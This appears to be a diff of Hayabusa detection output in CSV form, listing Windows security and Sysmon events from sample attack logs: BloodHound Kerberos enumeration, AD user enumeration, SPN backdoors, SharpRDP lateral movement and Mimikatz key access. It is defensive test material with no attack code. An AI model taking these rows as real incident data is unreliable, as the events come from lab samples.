+2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PKI01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: EXCHANGE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WSUS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: DHCP01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATANIDS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PRTG-MON$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ADFS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEBIIS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS03VULN$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ATACORE01$ | Computer: - | IP Addr: 10.23.42.30 | LID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
+2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
+2020-07-10 07:00:11.181 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52543 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 2568 | PGUID: 747F3D96-9371-5F07-0000-00102D024400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:27.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52545 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7356 | PGUID: 747F3D96-937F-5F07-0000-0010EBDD4400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:40.413 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52546 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7976 | PGUID: 747F3D96-938D-5F07-0000-001043A84500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\windows\system32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x68b4a | PID: 8032 | PGUID: 747F3D96-9390-5F07-0000-00105CBC4500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:58.550 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52547 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7456 | PGUID: 747F3D96-939F-5F07-0000-0010888E4600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | LID: 0x68b4a | PID: 7200 | PGUID: 747F3D96-93A2-5F07-0000-00108EC54600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 3096 | PGUID: 747F3D96-94C3-5F07-0000-001080B40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x3bfab | PID: 3248 | PGUID: 747F3D96-94CF-5F07-0000-0010BD590400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: rdpclip | Process: C:\Windows\System32\rdpclip.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\svchost.exe -k NetworkService -s TermService | LID: 0x3bfab | PID: 3304 | PGUID: 747F3D96-40F2-5F08-0000-0010D8A92C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:35.589 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:53627 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 824 | PGUID: 747F3D96-1350-5F08-0000-001014C50000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""\\tsclient\c\temp\stack\a.exe"" | Process: \\tsclient\c\temp\stack\a.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3bfab | PID: 4236 | PGUID: 747F3D96-40F5-5F08-0000-001095812D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-11 22:21:11.693 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-11 22:21:17.514 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-11 22:21:18.640 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
+2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
+2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
+2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
+2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
